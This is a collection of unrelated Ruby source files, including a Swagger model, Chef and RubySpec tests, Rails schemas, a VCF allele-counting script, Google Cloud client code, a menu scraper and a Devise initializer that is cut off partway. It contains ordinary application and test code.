# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
if attributes.has_key?(:'userUnsubscription')
if (value = attributes[:'userUnsubscription']).is_a?(Array)
self.user_unsubscription = value
end
end
if attributes.has_key?(:'adminUnsubscription')
if (value = attributes[:'adminUnsubscription']).is_a?(Array)
self.admin_unsubscription = value
end
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if @user_unsubscription.nil?
invalid_properties.push('invalid value for "user_unsubscription", user_unsubscription cannot be nil.')
end
if @admin_unsubscription.nil?
invalid_properties.push('invalid value for "admin_unsubscription", admin_unsubscription cannot be nil.')
end
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @user_unsubscription.nil?
return false if @admin_unsubscription.nil?
true
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
user_unsubscription == o.user_unsubscription &&
admin_unsubscription == o.admin_unsubscription
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[user_unsubscription, admin_unsubscription].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = SibApiV3Sdk.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 34.671429 | 839 | 0.643318 |
873f9d1845e7ed1d60dfc59447da0351daaf5ab5 | 1,969 | #
# Cookbook Name:: eos
# Spec:: default
#
# Copyright (c) 2016 Arista Networks, All Rights Reserved.
require 'spec_helper'
describe 'eos::default' do
context 'When all attributes are default, on an unspecified platform' do
let(:chef_run) do
runner = ChefSpec::ServerRunner.new(platform: 'fedora', version: '18')
runner.converge(described_recipe)
end
before(:each) do
cmd = '/usr/bin/FastCli -p 15 -c "show running-config" | grep unix-socket'
stub_command(cmd).and_return(true)
stub_command('test -S /var/run/command-api.sock').and_return(true)
end
it 'converges successfully with eAPI configured' do
expect { chef_run }.to_not raise_error
end
it 'converges successfully with eAPI not configured' do
cmd = '/usr/bin/FastCli -p 15 -c "show running-config" | grep unix-socket'
stub_command(cmd).and_return(false)
expect { chef_run }.to_not raise_error
end
it 'configures eAPI for unix-sockets when not detected' do
cmd = '/usr/bin/FastCli -p 15 -c "show running-config" | grep unix-socket'
stub_command(cmd).and_return(false)
expect(chef_run).to run_execute('Enable eAPI')
end
it 'does not reconfigure eAPI for unix-sockets when detected' do
expect(chef_run).to_not run_execute('Enable eAPI')
end
it 'ensures base chef files are persistent' do
expect(chef_run).to create_directory('/persist/sys/chef').with(
owner: 'root',
group: 'root',
mode: '0755'
)
expect(chef_run).to create_link('/etc/chef').with(
to: '/persist/sys/chef'
)
end
it 'installs rbeapi as a chef_gem' do
expect(chef_run).to install_chef_gem('rbeapi')
end
it 'installs ohai plugins' do
expect(chef_run).to create_ohai_plugin('eos')
expect(chef_run).to create_ohai_plugin('eos_hostname')
expect(chef_run).to create_ohai_plugin('eos_lldp_neighbors')
end
end
end
| 30.765625 | 80 | 0.670899 |
3833c82935d36886afb60ef480d519db55b6f762 | 1,979 | # encoding: UTF-8
# This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 20150129141225) do
create_table "cities", force: :cascade do |t|
t.text "name"
t.integer "population_2013"
t.integer "population_2010"
t.float "population_change"
t.integer "population_density"
t.integer "state_id"
end
create_table "coaches", force: :cascade do |t|
t.string "name"
t.integer "team"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
t.integer "wins"
t.integer "losses"
end
create_table "games", force: :cascade do |t|
t.datetime "quoted_date"
t.integer "home_team"
t.integer "away_team"
t.integer "home_score"
t.integer "away_score"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "states", force: :cascade do |t|
t.text "name"
t.text "abbr"
t.text "capital"
t.text "biggest_city"
t.integer "population"
t.integer "area"
end
create_table "teams", force: :cascade do |t|
t.text "name"
t.integer "wins"
t.integer "losses"
t.integer "ties"
t.text "division"
t.text "conference"
t.boolean "playoff"
t.integer "city_id"
end
end
| 30.446154 | 86 | 0.690753 |
26f689e497f97bda491979ace803e604ab6d04b3 | 525 | # frozen_string_literal: true
class Github::Actor < Github::Client
def self.get(date: nil)
new.get(date)
end
def get(date)
if date
response = @client.search_issues "repo:oss-gate/workshop is:issue created: #{date.to_s}"
else
response = @client.search_issues 'repo:oss-gate/workshop is:issue'
end
response.items.each do |res|
::Actor.create(name: res[:user][:login], icon_url: res[:user][:avatar_url])
rescue ActiveRecord::RecordNotUnique => e
puts e
end
end
end
| 23.863636 | 94 | 0.664762 |
d555416afebf23494b5e74525c02e5fe7d1a01b9 | 1,848 | require File.dirname(__FILE__) + '/../../spec_helper'
require File.dirname(__FILE__) + '/fixtures/classes'
# arcsine : (-1.0, 1.0) --> (-PI/2, PI/2)
describe "Math.asin" do
it "return a float" do
Math.asin(1).class.should == Float
end
it "returns the arcsine of the argument" do
Math.asin(1).should be_close(Math::PI/2, TOLERANCE)
Math.asin(0).should be_close(0.0, TOLERANCE)
Math.asin(-1).should be_close(-Math::PI/2, TOLERANCE)
Math.asin(0.25).should be_close(0.252680255142079, TOLERANCE)
Math.asin(0.50).should be_close(0.523598775598299, TOLERANCE)
Math.asin(0.75).should be_close(0.8480620789814816,TOLERANCE)
end
conflicts_with :Complex do
it "raises an Errno::EDOM if the argument is greater than 1.0" do
lambda { Math.asin(1.0001) }.should raise_error( Errno::EDOM)
end
it "raises an Errno::EDOM if the argument is less than -1.0" do
lambda { Math.asin(-1.0001) }.should raise_error( Errno::EDOM)
end
end
ruby_version_is ""..."1.9" do
it "raises an ArgumentError if the argument cannot be coerced with Float()" do
lambda { Math.asin("test") }.should raise_error(ArgumentError)
end
end
ruby_version_is "1.9" do
it "raises a TypeError if the argument cannot be coerced with Float()" do
lambda { Math.asin("test") }.should raise_error(TypeError)
end
end
it "raises a TypeError if the argument is nil" do
lambda { Math.asin(nil) }.should raise_error(TypeError)
end
it "accepts any argument that can be coerced with Float()" do
Math.asin(MathSpecs::Float.new).should be_close(1.5707963267949, TOLERANCE)
end
end
describe "Math#asin" do
it "is accessible as a private instance method" do
IncludesMath.new.send(:asin, 0.5).should be_close(0.523598775598299, TOLERANCE)
end
end
| 33.6 | 86 | 0.6829 |
f806e142758ed70368211c100324f6dbb36594b6 | 362 | # Ubuntu Amazon EC2 AMI Finder: https://cloud-images.ubuntu.com/locator/ec2/
#
module VarsAws
AWS_NAME = "bosh-jumpbox"
AWS_ACCESS_KEY = ""
AWS_SECRET_KEY = ""
AWS_KEY_PEMNAME = "keypair"
AWS_KEY_PEMPATH = "/home/$USER/keypair.pem"
AWS_UBUNTU_AMI = "ami-5189a661"
AWS_REGION = "us-west-2"
AWS_TYPE_INS = "t2.small"
AWS_SECURITY_GROUPS = ""
end
| 25.857143 | 76 | 0.709945 |
f849513c4a632fc5f463d9f86f2b4cc3250fd39f | 907 | module RescueRegistry
module Controller
extend ActiveSupport::Concern
included do
include Context
end
def process_action(*args)
if RescueRegistry.context
# Controller logger isn't yet available
Rails.logger.warn "Didn't expect RescueRegistry context to be set in controller"
Rails.logger.debug caller.join("\n")
end
# Setting something globally is not very nice, but it allows us to access it without
# having to change a whole lot of internal Rails APIs. This especially matters when
# getting the status code via ExceptionWrapper.
# We don't unset here so that it is available to middleware
# Unsetting happens in ActionDispatch::ShowExceptions. This _should_ be ok since we shouldn't
# be processing multiple requests in the same thread.
RescueRegistry.context = self
super
end
end
end
| 32.392857 | 99 | 0.70452 |
037700e17ebd7be0579bd77b4dd01350645ab801 | 1,299 | # frozen_string_literal: true
# Load database configuration
require_relative "../../../../config/database"
require "active_brainz"
namespace :active_brainz do
namespace :models do
desc "Annotate models"
task :annotate do
require "annotate"
options = Annotate
.setup_options
.merge models: "true",
model_dir: ["lib/active_brainz/models"],
position: "after",
position_in_class: "after",
show_indexes: true,
show_foreign_keys: true,
classified_sort: "true",
require: ["active_brainz"],
trace: "true"
ARGV.clear
# Patch annotate_model's integration with ActiveSupport::Inflector
# rubocop:disable Lint/ConstantDefinitionInBlock
module AnnotateModels
def self.get_loaded_model(model_path, file)
"active_brainz/#{model_path}".camelize.constantize
rescue NameError
# Strip namespace
"active_brainz/#{model_path.gsub(%r(^[^/]*/), '')}".camelize.constantize
rescue LoadError
super
end
end
# rubocop:enable Lint/ConstantDefinitionInBlock
Annotate.eager_load(options)
AnnotateModels.do_annotations(options)
end
end
end
| 27.638298 | 82 | 0.618168 |
79d458ad78a515ff57847eac51d3d175ec157995 | 3,431 | #!/usr/bin/ruby
if __FILE__ == $0
def get_depth(entry)
if( entry == '.')
return 0
else
return entry.to_i
end
end
$:.unshift File.join(File.dirname(__FILE__),'.')
require 'vcf_line'
if(ARGV.length < 1)
puts "USAGE: add_allele_freq.rb [vcf_file] -clean\n the -clean option will remove alleles with an allele count (AC) of zero"
exit(0)
end
vcf_file = ARGV[0]
clean_alleles = (ARGV[1] == '-clean')
labels=nil
File.open(vcf_file, 'r').each_line do |line|
if(line[0,1] == '#')
if( line[0,4] == '#CHR' )
labels = line.split("\t")
puts "##INFO=<ID=AC,Number=.,Type=Integer,Description=\"Allele count in genotypes\">"
puts "##INFO=<ID=AN,Number=1,Type=Integer,Description=\"Total number of alleles in called genotypes\">"
puts "##INFO=<ID=AF,Number=.,Type=Float,Description=\"Allele frequency\">"
end
puts line
next
end
vcf_line = Vcf_line.read_line(line, false, labels)
ac = Array.new
an = 0
vcf_line.alt.each do |allele|
ac.push 0
end
if(vcf_line.sample_names.length == 0)
STDERR.puts "File #{ARGV[0]} has sites only, no samples. No output produced."
exit(1)
end
vcf_line.sample_names.each do |sample_name|
unless(vcf_line.samples[sample_name].length == 0)
# deal with sample filters
if(vcf_line.samples[sample_name][:"FT"] != nil && vcf_line.samples[sample_name][:"FT"].to_s != "PASS" && vcf_line.samples[sample_name][:"FT"].to_s != ".")
if(vcf_line.samples[sample_name][:"GT"] =~ /[1-9]/)
vcf_line.samples[sample_name][:"GT"] = "./."
elsif(vcf_line.samples[sample_name][:"FT"].to_s != "No_data") # don't list filters for non-variant genotypes (except No_data)
vcf_line.samples[sample_name][:"FT"] = '.'
end
end
geno = vcf_line.samples[sample_name][:"GT"]
if(geno =~ /([\d\.]+)[\/\\|]([\d\.]+)/)
a1 = $1
a2 = $2
if(a1 =~ /\d+/)
an += 1
if(a1 != '0')
raise "could not find allele #{a2} in sample #{sample_name} on vcf line:\n #{line}" if ac[a1.to_i-1] == nil
ac[a1.to_i-1] += 1
end
end
if(a2 =~ /\d+/)
an += 1
if(a2 != '0')
raise "could not find allele #{a2} in sample #{sample_name} on vcf line:\n #{line}" if ac[a2.to_i-1] == nil
ac[a2.to_i-1] += 1
end
end
end
end
end
if(clean_alleles)
new_ac = ac.dup
removed_alleles = 0
ac.each_with_index do |allele_count, i|
if(allele_count == 0)
vcf_line.alt.delete_at(i-removed_alleles)
new_ac.delete_at(i-removed_alleles)
removed_alleles += 1
end
if(removed_alleles > 0)
vcf_line.sample_names.each do |sample_name|
allele_index = i + 1
vcf_line.samples[sample_name][:"GT"].gsub!(allele_index.to_s, (allele_index - removed_alleles).to_s) unless vcf_line.samples[sample_name][:"GT"].nil?
end
end
end
ac = new_ac
end
mafs = Array.new
vcf_line.info[:"AC"]=ac.join(",")
vcf_line.info[:"AN"]=an
ac.each do |one_ac|
#if(one_ac.to_f/an > 0.5)
# mafs.push (1.0-one_ac.to_f/an)
#else
# mafs.push (one_ac.to_f/an)
#end
mafs.push (one_ac.to_f/an)
end
vcf_line.info[:"AF"] = mafs
if(clean_alleles && ac.length == 0)
STDERR.puts "Line #{vcf_line.chr}:#{vcf_line.pos} has no variant calls, it will be removed."
else
raise "Line #{vcf_line.chr}:#{vcf_line.pos} has no variant calls!" if ac.length == 0
puts vcf_line.print()
end
end
end
| 28.831933 | 158 | 0.617021 |
f75088df9436f5a7afa6cf0a8e76d1bb95a8c5ba | 317 | # frozen_string_literal: true
class TezosClient
module Tools
class HashToMicheline < ActiveInteraction::Base
class Contract < Base
def encode
raise "#{data} #{data.class} Not a 'String' type" unless data.is_a? ::String
{ string: data }
end
end
end
end
end
| 21.133333 | 86 | 0.618297 |
1170bac039cc36a2c2e79527f4435aeda4b6ba7c | 1,842 | # TODO(test): Test 401 on bad login, etc
RSpec.describe RegistrationsController do
let!(:user) { create :user }
def serializer
UserSerializer
end
before { @request.env["devise.mapping"] = Devise.mappings[:user] }
describe '#create' do
context 'with a valid email and password' do
it 'registers a new user' do
expect {
post :create, params: { email: '[email protected]', password: 'password123' }
}.to change(User, :count).by(1)
expect(response).to have_http_status(200)
expect(parsed_response).to eq(serialize_one(User.last))
end
end
context 'with a valid email and invalid password' do
it 'registers a new user' do
expect {
post :create, params: { email: '[email protected]', password: 'bad' }
}.not_to change(User, :count)
expect(response).to have_http_status(200)
expect(parsed_response).to eq('errors' => [
'Password is too short (minimum is 6 characters)'
])
end
end
context 'with an invalid email and valid password' do
it 'registers a new user' do
expect {
post :create, params: { email: 'bad', password: 'password123' }
}.not_to change(User, :count)
expect(response).to have_http_status(200)
expect(parsed_response).to eq('errors' => ['Email is invalid'])
end
end
context 'with an invalid email and invalid password' do
it 'registers a new user' do
expect {
post :create, params: { email: 'bad', password: 'bad' }
}.not_to change(User, :count)
expect(response).to have_http_status(200)
expect(parsed_response).to eq('errors' => [
'Email is invalid',
'Password is too short (minimum is 6 characters)'
])
end
end
end
end
| 29.238095 | 84 | 0.607492 |
1c4f96133d5babc5b45c6864efb624c95e8cd281 | 5,397 | # frozen_string_literal: true
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
# Require this file early so that the version constant gets defined before
# requiring "google/cloud". This is because google-cloud-core will load the
# entrypoint (gem name) file, which in turn re-requires this file (hence
# causing a require cycle) unless the version constant is already defined.
require "google/cloud/policy_troubleshooter/version"
require "googleauth"
gem "google-cloud-core"
require "google/cloud" unless defined? ::Google::Cloud.new
require "google/cloud/config"
# Set the default configuration
::Google::Cloud.configure.add_config! :policy_troubleshooter do |config|
config.add_field! :endpoint, "policytroubleshooter.googleapis.com", match: ::String
config.add_field! :credentials, nil, match: [::String, ::Hash, ::Google::Auth::Credentials]
config.add_field! :scope, nil, match: [::Array, ::String]
config.add_field! :lib_name, nil, match: ::String
config.add_field! :lib_version, nil, match: ::String
config.add_field! :interceptors, nil, match: ::Array
config.add_field! :timeout, nil, match: ::Numeric
config.add_field! :metadata, nil, match: ::Hash
config.add_field! :retry_policy, nil, match: [::Hash, ::Proc]
config.add_field! :quota_project, nil, match: ::String
end
module Google
module Cloud
module PolicyTroubleshooter
##
# Create a new client object for IamChecker.
#
# By default, this returns an instance of
# [Google::Cloud::PolicyTroubleshooter::V1::IamChecker::Client](https://googleapis.dev/ruby/google-cloud-policy_troubleshooter-v1/latest/Google/Cloud/PolicyTroubleshooter/V1/IamChecker/Client.html)
# for version V1 of the API.
# However, you can specify specify a different API version by passing it in the
# `version` parameter. If the IamChecker service is
# supported by that API version, and the corresponding gem is available, the
# appropriate versioned client will be returned.
#
# ## About IamChecker
#
# IAM Policy Troubleshooter service.
#
# This service helps you troubleshoot access issues for Google Cloud resources.
#
# @param version [::String, ::Symbol] The API version to connect to. Optional.
# Defaults to `:v1`.
# @return [IamChecker::Client] A client object for the specified version.
#
def self.iam_checker version: :v1, &block
require "google/cloud/policy_troubleshooter/#{version.to_s.downcase}"
package_name = Google::Cloud::PolicyTroubleshooter
.constants
.select { |sym| sym.to_s.downcase == version.to_s.downcase.tr("_", "") }
.first
package_module = Google::Cloud::PolicyTroubleshooter.const_get package_name
package_module.const_get(:IamChecker).const_get(:Client).new(&block)
end
##
# Configure the google-cloud-policy_troubleshooter library.
#
# The following configuration parameters are supported:
#
# * `credentials` (*type:* `String, Hash, Google::Auth::Credentials`) -
# The path to the keyfile as a String, the contents of the keyfile as a
# Hash, or a Google::Auth::Credentials object.
# * `lib_name` (*type:* `String`) -
# The library name as recorded in instrumentation and logging.
# * `lib_version` (*type:* `String`) -
# The library version as recorded in instrumentation and logging.
# * `interceptors` (*type:* `Array<GRPC::ClientInterceptor>`) -
# An array of interceptors that are run before calls are executed.
# * `timeout` (*type:* `Integer`) -
# Default timeout in milliseconds.
# * `metadata` (*type:* `Hash{Symbol=>String}`) -
# Additional gRPC headers to be sent with the call.
# * `retry_policy` (*type:* `Hash`) -
# The retry policy. The value is a hash with the following keys:
# * `:initial_delay` (*type:* `Numeric`) - The initial delay in seconds.
# * `:max_delay` (*type:* `Numeric`) - The max delay in seconds.
# * `:multiplier` (*type:* `Numeric`) - The incremental backoff multiplier.
# * `:retry_codes` (*type:* `Array<String>`) -
# The error codes that should trigger a retry.
#
# @return [::Google::Cloud::Config] The default configuration used by this library
#
def self.configure
yield ::Google::Cloud.configure.policy_troubleshooter if block_given?
::Google::Cloud.configure.policy_troubleshooter
end
end
end
end
helper_path = ::File.join __dir__, "policy_troubleshooter", "helpers.rb"
require "google/cloud/policy_troubleshooter/helpers" if ::File.file? helper_path
| 45.737288 | 203 | 0.676672 |
d53131a365f4d054da4308ebde5a88c38c9bbd81 | 1,330 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
# [START securitycenter_v1_generated_SecurityCenter_DeleteNotificationConfig_sync]
require "google/cloud/security_center/v1"
# Create a client object. The client can be reused for multiple calls.
client = Google::Cloud::SecurityCenter::V1::SecurityCenter::Client.new
# Create a request. To set request fields, pass in keyword arguments.
request = Google::Cloud::SecurityCenter::V1::DeleteNotificationConfigRequest.new
# Call the delete_notification_config method.
result = client.delete_notification_config request
# The returned object is of type Google::Protobuf::Empty.
p result
# [END securitycenter_v1_generated_SecurityCenter_DeleteNotificationConfig_sync]
| 39.117647 | 82 | 0.797744 |
bb902767ecc4fcdbb50f361897354e1a1bd2ba96 | 374 | class ScanBuild < Formula
desc "Clang Static Analyzer"
homepage "http://clang-analyzer.llvm.org/scan-build.html"
url "https://clang-analyzer.llvm.org/downloads/checker-279.tar.bz2"
sha256 "f583b58d207e14ce6fc64a623c11d0d8001ab69ffb444b73ba638436a245c784"
def install
prefix.install Dir["*"]
end
test do
system "#{bin}/scan-build", "--help"
end
end
| 24.933333 | 75 | 0.735294 |
26ab04c58941a1a535e766b4bbaabfff2480a438 | 4,757 | # frozen_string_literal: true
require 'chromedriver-helper'
require 'fileutils'
require 'open-uri'
require 'watir'
require_relative '../helpers/application_helper'
require_all 'app/models'
# Contains logic to scrape a full menu
class FullMenu < Menu
attr_reader :html
def initialize(url, campus)
type = 'Full'
cache_key = "#{$ENVIRONMENT}_#{menu_route_builder(campus, type, nil, nil, { nil: nil } )}"
# Check cache before continuing
cache_value = $REDIS.get(cache_key)
unless cache_value.nil?
@html = cache_value
return
end
menu_html_string, url_updated = scrape_menu_html(url, campus)
scraped_path_arrays = scrape_file_link(menu_html_string)
scraped_path_arrays.each do |scraped_path_array|
menu_html_string = overwrite_file_links(scraped_path_array, url_updated, menu_html_string)
end
full_menu_file = Nokogiri::HTML(menu_html_string)
menu_name = "#{type} Menu"
update_menu_headers(full_menu_file, menu_name, campus)
# Remove CK's version of Bootstrap
full_menu_file.xpath('//link/@href').each do |link|
if link.value == "https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css"
link.remove
end
end
# Apply invert-logo class to logos that are not dark theme friendly
invert_logo_array = [
'Pop-Up',
'Baker & Butcher',
'Novita'
]
full_menu_file.css('.print-eatery').each do |eatery|
title = eatery.css('h2').text
if invert_logo_array.include?(title)
eatery.search('.logo')[0]['class'] = 'logo invert-logo'
end
end
@html = full_menu_file.inner_html
# Cache menu
cache(cache_key, @html)
rescue Watir::Wait::TimeoutError, StandardError => e
puts "#{$X_MARK} Error: Couldn't scrape menu from the CK website for \"#{campus}\""
puts e.message
end
private
# Replaces relative links in the original HTML with the full URL
def overwrite_file_links(paths_array, url, menu_html_string)
paths_array.each do |path|
full_url_path = url + path.gsub(/\?[\S]+/, '')
menu_html_string.gsub!(path, full_url_path)
end
menu_html_string
end
# Scrapes all links to PNGs and CSS files referenced by the menu
def scrape_file_link(menu_html_string)
scraped_png_url_paths = []
scraped_css_url_paths = []
# Get strings wrapped in quotation marks
scarped_strings = menu_html_string.scan(/\"[\S]+\"/)
# Remove double quotation marks
scarped_strings.map! { |string| string.gsub(/"/, '') }
scarped_strings.each do |string|
scraped_png_url_paths.push(string) unless string.scan('.png').empty?
scraped_css_url_paths.push(string) unless string.scan('.css').empty?
end
scraped_png_url_paths = scraped_png_url_paths.uniq.map { |string| string unless string.scan('images').empty? }.compact
scraped_css_url_paths = scraped_css_url_paths.uniq.map { |string| string if string.scan('http').empty? }.compact
[
scraped_png_url_paths,
scraped_css_url_paths
]
end
# Creates a headless Chrome browser instance
def new_browser
options = Selenium::WebDriver::Chrome::Options.new
# Make a directory for chrome if it doesn't already exist
chrome_dir = File.join Dir.pwd, %w(tmp chrome)
FileUtils.mkdir_p chrome_dir
user_data_dir = "--user-data-dir=#{chrome_dir}"
# Add the option for user-data-dir
options.add_argument user_data_dir
# Let Selenium know where to look for chrome if we have a hint from Heroku
# chromedriver-helper & chrome seem to work out of the box on osx, but not on Heroku
if chrome_bin = ENV["GOOGLE_CHROME_SHIM"]
options.add_argument "--no-sandbox"
options.binary = chrome_bin
end
# Headless arguments
options.add_argument "--window-size=1200x600"
options.add_argument "--headless"
options.add_argument "--disable-gpu"
# Make the browser
browser = Watir::Browser.new :chrome, options: options
browser
end
# Scrapes the html of the menu for a particular campus
def scrape_menu_html(url, campus)
browser = new_browser
browser.goto url
raise "Couldn\'t reach url \"#{url}\"" if browser.html.include? 'This site can’t be reached'
url_updated = browser.url.end_with?('/') ? browser.url.chop : browser.url
browser.div(class: 'tray').ul.li(:text => /#{campus}/).button.wait_until(&:present?)
browser.div(class: 'tray').ul.li(:text => /#{campus}/).button.click!
print_menu_url = '/menu/print'
browser.goto url_updated + print_menu_url
browser.div(class: 'print-eatery').wait_until(&:present?)
menu_html_string = browser.html
browser.close
[
menu_html_string,
url_updated
]
end
end
| 30.107595 | 122 | 0.692243 |
1cee94a635dddee30913df08fa8e2bcbda018f31 | 162 | class CreateUsers < ActiveRecord::Migration[5.0]
def change
create_table :users do |t|
t.string :username
t.string :password
end
end
end
| 16.2 | 48 | 0.660494 |
21ce25d17c4cb6ddf933bd9b579be6e0c044fcde | 1,093 | # encoding: UTF-8
# This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 20191010182945) do
create_table "tweets", force: :cascade do |t|
t.string "content"
t.integer "user_id"
t.datetime "created_at"
t.datetime "updated_at"
end
create_table "users", force: :cascade do |t|
t.string "username"
t.string "email"
t.string "password_digest"
end
end
| 36.433333 | 86 | 0.752059 |
4a07d5071a403374639bffdd7c234a56e8724c0a | 344 | module Galaxy
module Invaders
Enemy = Struct.new(
:x0, :y0,
:x1, :y1,
:x2, :y2,
:x3, :y3
) do
def area
@area ||=
[
Vector2.new(x0, y0),
Vector2.new(x1, y1),
Vector2.new(x2, y2),
Vector2.new(x3, y3)
]
end
end
end
end
| 16.380952 | 32 | 0.398256 |
d5b122adbb73e109601b9e36dc19989663ac318d | 12,753 | # Use this hook to configure devise mailer, warden hooks and so forth.
# Many of these configuration options can be set straight in your model.
Devise.setup do |config|
# The secret key used by Devise. Devise uses this key to generate
# random tokens. Changing this key will render invalid all existing
# confirmation, reset password and unlock tokens in the database.
# config.secret_key = '15e7c1ecb6a230f6ae08136c146cbdd16e88c836c1a1415a5a72be268313380a0e66bb88fbd8ccb242dc80944fdb188e7d4dc46cf9c5a2b9eb963490e3d3aa41'
# ==> Mailer Configuration
# Configure the e-mail address which will be shown in Devise::Mailer,
# note that it will be overwritten if you use your own mailer class
# with default "from" parameter.
config.mailer_sender = '[email protected]'
# Configure the class responsible to send e-mails.
# config.mailer = 'Devise::Mailer'
# ==> ORM configuration
# Load and configure the ORM. Supports :active_record (default) and
# :mongoid (bson_ext recommended) by default. Other ORMs may be
# available as additional gems.
require 'devise/orm/active_record'
# ==> Configuration for any authentication mechanism
# Configure which keys are used when authenticating a user. The default is
# just :email. You can configure it to use [:username, :subdomain], so for
# authenticating a user, both parameters are required. Remember that those
# parameters are used only when authenticating and not when retrieving from
# session. If you need permissions, you should implement that in a before filter.
# You can also supply a hash where the value is a boolean determining whether
# or not authentication should be aborted when the value is not present.
# config.authentication_keys = [ :email ]
# Configure parameters from the request object used for authentication. Each entry
# given should be a request method and it will automatically be passed to the
# find_for_authentication method and considered in your model lookup. For instance,
# if you set :request_keys to [:subdomain], :subdomain will be used on authentication.
# The same considerations mentioned for authentication_keys also apply to request_keys.
# config.request_keys = []
# Configure which authentication keys should be case-insensitive.
# These keys will be downcased upon creating or modifying a user and when used
# to authenticate or find a user. Default is :email.
config.case_insensitive_keys = [ :email ]
# Configure which authentication keys should have whitespace stripped.
# These keys will have whitespace before and after removed upon creating or
# modifying a user and when used to authenticate or find a user. Default is :email.
config.strip_whitespace_keys = [ :email ]
# Tell if authentication through request.params is enabled. True by default.
# It can be set to an array that will enable params authentication only for the
# given strategies, for example, `config.params_authenticatable = [:database]` will
# enable it only for database (email + password) authentication.
# config.params_authenticatable = true
# Tell if authentication through HTTP Auth is enabled. False by default.
# It can be set to an array that will enable http authentication only for the
# given strategies, for example, `config.http_authenticatable = [:database]` will
# enable it only for database authentication. The supported strategies are:
# :database = Support basic authentication with authentication key + password
# config.http_authenticatable = false
# If 401 status code should be returned for AJAX requests. True by default.
# config.http_authenticatable_on_xhr = true
# The realm used in Http Basic Authentication. 'Application' by default.
# config.http_authentication_realm = 'Application'
# It will change confirmation, password recovery and other workflows
# to behave the same regardless if the e-mail provided was right or wrong.
# Does not affect registerable.
# config.paranoid = true
# By default Devise will store the user in session. You can skip storage for
# particular strategies by setting this option.
